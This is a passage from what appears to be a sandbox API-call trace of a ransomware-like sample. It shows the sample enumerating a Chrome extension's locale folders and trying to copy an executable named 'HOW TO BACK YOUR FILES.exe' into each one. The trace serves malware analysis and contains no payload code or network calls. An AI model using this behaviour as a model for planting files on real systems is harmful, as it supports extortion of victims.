ftCreationTime.dwLowDateTime=0x834fccb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5c2620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5c2620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.255] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr" [0111.255] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr" [0111.255] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.255] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.256] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.256] GetLastError () returned 0x0 [0111.256] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834f0960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5e8780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5e8780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.257] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml" [0111.257] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml" [0111.257] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.257] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.258] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.258] GetLastError () returned 0x0 [0111.258] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834e9430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5e8780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5e8780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.259] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv" [0111.259] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv" [0111.259] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.259] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.259] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.260] GetLastError () returned 0x0 [0111.260] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834da9d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d60e8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d60e8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt" [0111.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt" [0111.261] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.261] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.261] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.261] GetLastError () returned 0x0 [0111.262] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.262] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834d34a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d60e8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d60e8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.262] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko" [0111.262] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko" [0111.262] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.262] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.263] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.263] GetLastError () returned 0x0 [0111.263] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.264] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834cbf70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d634a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d634a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn" [0111.264] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn" [0111.264] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.264] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.265] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.265] GetLastError () returned 0x0 [0111.265] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.265] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834c4a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d634a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d634a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.266] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" [0111.266] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja" [0111.266] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.266] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.267] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.267] GetLastError () returned 0x0 [0111.267] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834b86f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d680d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d680d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.267] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" [0111.268] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw" [0111.268] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.268] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.268] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.269] GetLastError () returned 0x0 [0111.269] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834aeab0, 